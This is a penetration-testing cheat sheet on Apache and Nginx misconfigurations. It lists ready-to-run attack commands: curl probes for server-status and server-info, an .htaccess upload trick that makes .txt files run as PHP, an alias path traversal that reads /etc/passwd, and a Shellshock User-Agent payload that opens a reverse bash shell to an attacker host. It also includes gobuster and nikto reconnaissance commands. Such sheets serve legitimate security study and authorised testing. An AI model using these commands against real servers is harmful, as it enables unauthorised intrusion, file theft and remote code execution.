Apache / Nginx Misconfigs
What it is: The two most popular web servers on the internet. Apache serves ~30% and Nginx ~34% of all websites. Misconfigurations like exposed server-status, .htaccess abuse, alias traversal, and Shellshock are the main attack vectors.
Default ports: 80, 443, 8080
Vuln research:
- Apache CVEs — CVE Details
- Nginx CVEs — CVE Details
- SearchSploit:
searchsploit apache/searchsploit nginx - HackTricks — Apache
Apache server-status exposure
Reveals active connections and URLs — Information disclosure
curl http://$IP/server-status
curl http://$IP/server-info
Apache .htaccess tricks
If you can upload .htaccess — Execute arbitrary extensions as PHP
# Upload .htaccess with:
AddType application/x-httpd-php .txt
# Now any .txt file executes as PHP
Nginx alias traversal
Misconfigured alias directive — Path traversal to read files
# If config has: location /files { alias /var/www/files/; }
curl http://$IP/files../etc/passwd
Apache mod_cgi shellshock (CVE-2014-6271)
RCE via CGI scripts — If /cgi-bin/ scripts exist
gobuster dir -u http://$IP/cgi-bin/ -w /usr/share/wordlists/dirb/common.txt -x sh,cgi,pl
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh
Check for default pages and info
Quick info gathering on web servers
nikto -h http://$IP
# Check: /phpinfo.php, /info.php, /.git/, /.env